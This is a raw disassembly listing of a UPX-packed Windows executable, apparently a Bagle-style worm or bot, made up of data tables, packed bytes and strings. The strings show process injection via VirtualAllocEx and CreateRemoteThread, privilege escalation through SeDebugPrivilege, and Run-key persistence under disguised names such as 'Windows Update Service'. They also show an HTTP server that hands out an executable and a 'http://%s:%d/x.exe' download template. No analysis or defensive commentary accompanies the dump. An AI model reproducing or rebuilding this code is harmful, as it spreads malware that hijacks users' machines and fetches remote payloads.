dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19_2 db 'uterm19.2',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 10h
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 10h
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D3C dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 10h
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 10h
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 10h
aU19_2x db 'u19.2x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 10h
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 10h
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 4
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 4
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 70h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 45000201h
dd 40DD34h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D30h, 50788B34h, 0A0F44D89h
dd 8D7031B4h, 1BDBD84Bh, 0CD5285D8h, 1F0F552h, 0EC7047D2h
dd 0EC1265F1h, 0D790ED74h, 9ABD1110h, 0E82636Ch, 5D231409h
dd 0F11BE164h, 5051F84Dh, 68971818h, 8B1B1528h, 5DB0892Ah
dd 58D1B040h, 6B03CA3Ah, 5E30EB34h, 193B5BB5h, 0F05559ABh
dd 52EA037Dh, 45E626B7h, 3151F03Eh, 3DC25350h, 0AC1ED9F1h
dd 0D6BDF435h, 3C4FFAFAh, 0D06A1778h, 3BEC5577h, 5F0574C7h
dd 589B56B9h, 8CBF1BEBh, 0B9CD2534h, 0E5985CDh, 7EB05FCh
dd 0A1EF7408h, 5817D487h, 51515FFCh, 6468512Fh, 310F60B8h
dd 0D00D5C69h, 252C8836h, 0B1AFDDB8h, 0AEBAC44Ch, 0FECB213h
dd 71C22D59h, 0F9EBA67Bh, 3CBCB66Ah, 35500C80h, 0A82C49DDh
dd 2C507D50h, 91165DC0h, 2019852Eh, 0A971437Ch, 8B577F16h
dd 0D214247Ch, 0FD177E11h, 8760CFFFh, 61C2801Ah, 461E1488h
dd 0E97CF73Bh, 3B2480h, 593575B6h, 448B548Ch, 65A5F2Eh
dd 0ACF19D0Ch, 66DB5657h, 0BB622F21h, 0DC73074Bh, 501950F0h
dd 4D000056h, 0ACAA25B8h, 0DBC49577h, 4DF0E3DAh, 0FA6849F4h
dd 65FFF00Ch, 0C7A326DAh, 0CC343408h, 7B666B2Ah, 754C2EB2h
dd 0BC500A0Ah, 0E84F8520h, 54181A5Ch, 7FB807C6h, 5F6B7C3Bh
dd 40740180h, 1008B0Ch, 448D5108h, 0B166D824h, 30215F73h
dd 5903D311h, 4D3E13BAh, 0CC150724h, 0C82007BBh, 1D0CF1FEh
dd 0C8E4332Fh, 10E7C1F8h, 0D9919E6Ch, 0B60B85h, 915D8B02h
dd 12351C09h, 4001F333h, 0C2C03AB2h, 0CFC653C4h, 0E3676D5Eh
dd 5035F211h, 0B4B06825h, 831C0135h, 33ADE748h, 0B5ECF203h
dd 9541F017h, 7568CC35h, 3D986866h, 6C58B7A3h, 0F0446EC6h
dd 58FE474Fh, 0B31A54Dh, 0DA141B37h, 0EEBF0354h, 34007C74h
dd 0B933A1h, 0BAEDDB79h, 3BC72B7Fh, 8B0272C1h, 292BE1C1h
dd 318E8A1h, 0BF8923C7h, 0CCACDCA5h, 1172233Dh, 0A36786Ah
dd 40F868CFh, 0E113C4EBh, 5B3D9350h, 0D411778Ch, 5815941Eh
dd 68C9BB93h, 68030B40h, 6759973Ch, 3A3CB36Dh, 52535453h
dd 8FA311F8h, 9824D083h, 4DB04C2h, 30232C66h, 0B1F70E64h
dd 60B0C0B5h, 4EE808D0h, 3A95D0DDh, 6806C8EEh, 1D898068h
dd 0EEDB6897h, 7E182784h, 0D4C014ECh, 0DB3000F2h, 539153DAh
dd 3A01027Bh, 4D26B51Ah, 0FD7780EBh, 39ACD28Dh, 2F741A4Dh
dd 1D59DECDh, 0CA3DC9Eh, 0B6FEA365h, 0A49784C6h, 565153FCh
dd 37D83A86h, 6874B623h, 5EF92656h, 0FBE369Ah, 10C25819h
dd 56C05E05h, 8499A5E9h, 89E80C4Bh, 0D80DEC5Dh, 53BFB7Dh
dd 1FFF25FFh, 0A3C33A04h, 0E77443FCh, 37FA126Fh, 84CC8A1Fh
dd 50DF74C9h, 6E42EA6Bh, 5F57C661h, 6465A540h, 0AFA6B0Ch
dd 5F7B4499h, 1FD814F8h, 0E8FEB3ABh, 7E689E48h, 624E1520h
dd 7B385097h, 0CF53E2EBh, 9043455Fh, 3059875Eh, 3CAE7001h
dd 36D0F433h, 11D6B0EBh, 0D6E6023Eh, 0C1E6C342h, 68B4803Ah
dd 63A3ABB4h, 0BE608AC0h, 7B7C74E0h, 76336182h, 0E4FBF4A3h
dd 4552B73Dh, 767BB37Dh, 640D29E0h, 1BE21904h, 23B26863h
dd 9C170D13h, 0EB13EC13h, 7EC6AC86h, 99AE13EDh, 44F83569h
dd 0E4093970h, 8F401824h, 4DC3390h, 8C64D24Bh, 0EF609045h
dd 391C8E06h, 98589472h, 0A0489C50h, 2391C840h, 0A838A447h
dd 1C28AC30h, 0B0E47239h, 0B81CB420h, 9114BC18h, 0C08E4723h
dd 0C80CC410h, 0F3E47208h, 0D000CCC8h, 0F8D44DFCh, 8E6DF4D8h
dd 0F0DC391Ch, 0E8E4ECE0h, 6CD7E068h, 3704C011h, 0DEA36CD3h
dd 0ADB72F1Bh, 8C02FCB0h, 12730983h, 6EDD8C34h, 85414B80h
dd 594A8D90h, 0E8EB0CFFh, 9C8709B1h, 5CB40D1Ah, 7E0F991Ah
dd 748739A1h, 4DD86839h, 989DA8ABh, 4D373D8Ch, 0F6DC806h
dd 0DD26121h, 4659AC0h, 5BB3B724h, 1521C46Bh, 16A20A34h
dd 0E41173E3h, 2842276Eh, 0D21E5F9Ah, 0B414AE87h, 1388F818h
dd 24E3EB9Ch, 99093C28h, 95AF5A15h, 247031B6h, 0A4806355h
dd 1F0AAD7Fh, 8A51AD01h, 6A9E0B45h, 0EC380C1Eh, 52DB32FFh
dd 3831CC3Ah, 108FE35Dh, 8825DCDFh, 7D20B5Dh, 35B70FFDh
dd 80CF5A0Ch, 0F59A93Fh, 3FEF799h, 0C3FE8ED6h, 0FC65B2EDh
dd 72FFFB80h, 62BA5EBDh, 3B265F76h, 6F045981h, 0A0586833h
dd 4F43856Dh, 40A8108h, 9DB59B0Ch, 8F0B090Dh, 9B49275h
dd 0F758076h, 2C255FF9h, 0D9DADE41h, 84323D89h, 0E7D703FFh
dd 43EB50DBh, 9623FB81h, 5D875F9Fh, 13B166BAh, 5A737B4Fh
dd 73C196A2h, 2FE665h, 0DBE78B79h, 0FF04FD73h, 7F3CF6FEh
dd 0C6C5B688h, 0F50F339Fh, 0F33B088Bh, 3B27AADCh, 0A33E1D8Bh
dd 2F9E57A0h, 2259ED57h, 0F8D69C60h, 56E21359h, 0FFC390E2h
dd 0EE75B3BBh, 5E1AC8ECh, 271068F2h, 0D3BED3A6h, 1C18099Eh
dd 2D70843Ch, 2AD650A9h, 454E6105h, 32F8FC2h, 5C6A2BA6h
dd 9DCDF2AAh, 3A4C5E0Fh, 6E030BFCh, 0B0AB60C0h, 103B4E35h
dd 0BC025E11h, 42BA275Bh, 80C6096Ch, 0FAE17616h, 6F39DF0Bh
dd 57935655h, 57B1019h, 13E6D884h, 8F0D0CC3h, 1F0CA551h
dd 0B120DDFDh, 1462F489h, 0BF66153h, 340B7F02h, 38506ADBh
dd 52C5D08h, 740096D2h, 0B5E8F1AEh, 1110918h, 3BB00510h
dd 141960E1h, 6D84F00h, 103B0E17h, 0BDAAA27Eh, 0D5530D74h
dd 203C51C7h, 11106844h, 18244C39h, 37D0DB0Eh, 0ED85ED3Ah
dd 4BA5117Eh, 834D2C26h, 14DB0EEDh, 0A20596EFh, 750DF2EBh
dd 24B7160Eh, 0FADDEB65h, 2C193F68h, 1B33D170h, 46CE0C96h
dd 0A915182Ch, 0E974106Eh, 1408FA10h, 18D9512Fh, 165B1B56h
dd 1837FC72h, 3D563EF6h, 0B8C6239h, 412ADC74h, 0C0B6E965h
dd 2050D361h, 6C5F1810h, 3089381h, 550F5EAAh, 344AEB8Bh
dd 33E1C68Bh, 32C562Eh, 5359D932h, 27005556h, 108B59CBh
dd 0C520A25h, 724C5904h, 0AF5D0C20h, 0E418713Ch, 0DE530128h
dd 7EDE4E21h, 8E6956E2h
dd 1E3C3494h, 794E365Ch, 0D8875F7h, 1D140487h, 0B2582D28h
dd 7AA4BBC5h, 0D85A3568h, 3D9A045Eh, 203B10F4h, 813DDF06h
dd 7D221DCFh, 1E748D47h, 983F7B01h, 56FCCF40h, 0FF1C1E48h
dd 0DEA5E417h, 4545E0B5h, 521F0FFFh, 36666C38h, 46506008h
dd 0E6740E1Ch, 89BD766Ah, 36A93CB7h, 0D68681B2h, 4FB0B657h
dd 8E47069Ch, 84D4391Ch, 70DC78D8h, 0C8E464E0h, 4CE42391h
dd 24EC40E8h, 72398326h, 4F414F0h, 9C4C84B7h, 0BF0B9A2Fh
dd 8AF9BE64h, 7E2C742Ch, 0C43D188Bh, 34597B06h, 177572B4h
dd 0D354490Eh, 91DC113h, 48833E2Ah, 0A3C9A891h, 88E075BDh
dd 0C1361188h, 9746A78h, 317674B4h, 8859FE8Bh, 0BCDE636Ah
dd 0F82FA184h, 83227027h, 0C08303E0h, 51705705h, 59CD45E9h
dd 230DCAFDh, 1210CFD7h, 0BDCCC33Dh, 26D60713h, 9D3F140Eh
dd 0E887B305h, 40A26150h, 0E84D096Fh, 0C63F4120h, 99598B36h
dd 41D986D7h, 60D9F424h, 1F4541Bh, 61E812B8h, 8BE007BAh
dd 22E7D89Fh, 1FC517D0h, 0A600C748h, 5914310Dh, 21BA1025h
dd 0B3BFBF08h, 501D6AE0h, 71DCBFh, 0A03F514Fh, 7403D583h
dd 0BB0A3137h, 615FD8A0h, 52D1BEA7h, 8B37F453h, 0BC3D660Dh
dd 0B1383D53h, 0EE6BDB3Ah, 0CE590FEBh, 368B632h, 1B0C165Bh
dd 16C965E2h, 0C2268DDCh, 3141CC68h, 683A464Eh, 0B9BB66E7h
dd 12971A0Dh, 66AF495Eh, 4A4C12C1h, 0DE1219EEh, 0BBC631D8h
dd 162CFD3Bh, 0B596C823h, 0A3480710h, 0CF216C5h, 0CD6015EBh
dd 1CA65709h, 5D511910h, 43D5F07Dh, 5044330Ch, 856A7D68h
dd 138B67BEh, 0CC4011h, 0F23306FFh, 5284CDCh, 0F0F410F8h
dd 3DF52351h, 9B51001Bh, 0FBF63F8Dh, 14723BBEh, 2D0BE981h
dd 17018504h, 0C82BEC73h, 0D5A0568Bh, 8B0CC4B7h, 0EA088BE1h
dd 0C6C653A3h, 6443B646h, 4958055Ch, 0A8A04500h, 51E600C0h
dd 6F18054h, 0E296EF02h, 53522497h, 8F803141h, 8DF50101h
dd 0FFFF1183h, 5279FFFFh, 3AE42AECh, 9B49E7F6h, 0AFBEE0EAh
dd 447EDB21h, 615E1A95h, 1F85A032h, 0FF949F6Ah, 43FF3994h
dd 0A684FFFFh, 0CE358F26h, 0C9A55C1Dh, 657AB20Bh, 4D373072h
dd 6C697A6Fh, 0FF6B616Ch, 342FFFFFh, 2820302Eh, 706D6F63h
dd 62697461h, 203B656Ch, 4549534Dh, 9153620h, 7FFFBA81h
dd 646E6957h, 2073776Fh, 3520544Eh, 3429312Eh, 0BE798EE4h
dd 0D4007767h, 0B4C40104h, 0E790A00Eh, 80E7BEFBh, 0E680474h
dd 9B480958h, 3C9E79ECh, 4530D474h, 0E7C82220h, 4A1026F9h
dd 40F80030h, 6FFDB6B7h, 76766313h, 7E75722Eh, 65070077h
dd 0C6DFEF64h, 65976CB6h, 65C1660Fh, 72616573h, 370E6863h
dd 1F6FFE57h, 6F626F72h, 61686378h, 1FD2676Eh, 7C8D7465h
dd 720C6FFBh, 69622E64h, 2861007Ah, 616B6863h, 0BB17376Dh
dd 6740CB0h, 24782Dh, 0B76F6C06h, 0E6DB66Dh, 476B3762h
dd 7A027626h, 0DFB1852Eh, 1B7674DEh, 706F7411h, 69176E2Eh
dd 10ADB00Fh, 332773B0h, 6F0F788Dh, 611FE176h, 746C7564h
dd 694B652Dh, 0E1338072h, 6FDB6EDBh, 4E73A66Eh, 67622E74h
dd 6B67694Fh, 32580FBFh, 61777800h, 62626A2Ch, 0F676DFADh
dd 7A9B006Fh, 0A8616661h, 23655D2Eh, 10FFFE5Ch, 6261AF09h
dd 66656463h, 6A696867h, 6E6D6C6Bh, 0DDBF0A1Bh, 0F77271C5h
dd 78777675h, 43650E79h, 0F8DFED44h, 474645FFh, 4B4A4948h
dd 4F4E4D4Ch, 54545150h, 58575655h, 71B5A59h, 23187FF6h
dd 70747468h, 252F2F3Ah, 0DF2F0B73h, 65737E16h, 68702E97h
dd 3D0E3F70h, 6373260Fh, 0CF6FED6Eh, 2664066Fh, 76666E69h
dd 39313D3Bh, 1526322Eh, 0B948EC1Eh, 0EBA21D74h, 32313D58h
dd 7F7D9137h, 3101A8D7h, 3030383Ah, 0DFDF652Fh, 1FFFFB00h
dd 5DDFE8B0h, 0B966C933h, 758D01EEh, 8AFE8B05h, 7993C06h
dd 6DFFFD06h, 302C0646h, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 0FEFFDB7Eh, 6765DF85h, 9993712Eh, 0FD1201C9h, 16FD91BDh
dd 0FEEBC107h, 6872FFFDh, 66FD42AAh, 0BA10FDAAh, 98A91C14h
dd 98F3C91Ah, 28608F1h, 763FF67Fh, 9010C071h, 9237CB5Fh
dd 781C9659h, 57E4143Ah, 7DB77D71h, 3A0A61F2h, 9DF34571h
dd 98904F1h, 0DF73A47Fh, 119C04F1h, 0F367B340h, 1C10F0E3h
dd 0B1DDBDFEh, 59B20BDCh, 25C99B60h, 414D901h, 0B1F2C8A1h
dd 71CA17C7h, 688D2B9Eh, 0ADAD9161h, 1AC2F67Dh, 111D96E2h
dd 0C850B228h, 0FDBB9900h, 0DC14EDB3h, 12255557h, 91C0A44Eh
dd 0ED994912h, 9FBB54F7h, 1400DBFDh, 0CBCA3AC4h, 0FF1C3B71h
dd 1A21E424h, 6D93CDCFh, 8FCDB0F6h, 3F812C66h, 76CDF31Eh
dd 0B8B0FBFFh, 12CDC383h, 0CBC9A85Dh, 99AD251Dh, 24B64FECh
dd 0A6485A0Bh, 1B14C096h, 3FD9767Eh, 0EBA7294Ch, 0E9BA9CF3h
dd 26F43416h, 3FFEEE71h, 0EFCF5FBh, 0EF133BF9h, 376B4629h
dd 4766DE5Fh, 0ECA0A8ECh, 16CDFFFDh, 0FFC5B701h, 0E9ECE9EDh
